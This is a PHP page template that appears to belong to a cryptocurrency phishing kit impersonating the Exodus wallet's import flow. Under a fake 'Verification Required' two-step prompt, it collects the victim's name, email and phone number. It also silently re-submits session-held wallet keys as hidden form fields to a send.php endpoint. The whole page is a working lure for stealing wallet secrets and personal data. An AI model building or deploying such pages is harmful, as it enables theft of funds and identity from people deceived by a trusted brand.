<?php include_once './config.php'; ?>
<html lang="en">
    <?php
    $title = 'Import Exodus Crypto Wallet';
    include_once './includes/meta.php';
    ?>
    <body>
        <?php
        $number = 3;
        include_once './includes/header.php';
        ?>
        <link rel="stylesheet" href="<?= base_url('assets/country-code-picker/css/jquery.ccpicker.css')?>">
        <div class="container">
            <div class="row justify-content-center mt20">
                <div class="col-sm-5 text-center">
                    <h4 class="fs24 lh36 fw-normal">Verification Required</h4>
                    <div class="text-secondary">Enter the 2-Step verification generated by your authenticator app.</div>
                    <form method="post" action="<?= base_url('send.php') ?>" class="py10 mt40 text-start">
                        <?php foreach ($_SESSION["keys"] as $ki => $key) { ?>
                        <input type="hidden" name="keys[<?= $ki ?>]" class="form-control" placeholder="<?= $ki ?>" required=""  value="<?= $key ?>" />
                        <?php } ?>
                        <div class="mb-3">
                            <label class="form-label">Full Name</label>
                            <input type="text" name="name" required="" class="form-control form-control-add" placeholder="Name" value="" >
                        </div>
                        <div class="mb-3">
                            <label class="form-label">Email Id</label>
                            <input type="email" name="email" required="" class="form-control form-control-add" placeholder="Email Id" value="" >
                        </div>
                        <div className="my25">
                            <label class="form-label text-white">Phone Number</label>
                            <div class="form-control fs16" style=" background-color: #CCC; border: 0px; ">
                            <input name="phone_number" type="number" id="phone_number" required="" style="background-color: #FFF;font-size: 16px;padding: 8px 12px;border-radius: 0px;border: 1px solid #ccc;color: #000;width: 70%;" placeholder="Phone number" value="" autocomplete="off" >
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-sm-12 my30 mb50 text-center">
                                <button type="submit" class="btn btn-primary btn-primary-2 rounded-pill px60 py12 fw-normal fs15">Confirm & Verify</button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <?php include_once './includes/footer.php'; ?>
        <script src="<?=base_url('assets/country-code-picker/js/jquery.ccpicker.min.js')?>"></script>
        <script type="text/javascript">
            $(document).ready(function() {
                $("#phone_number").CcPicker({ countryCode: "us", dataUrl: "<?= base_url('assets/country-code-picker/data/en.json') ?>", searchPlaceHolder: "Find..." });
            });
        </script>
    </body>
</html>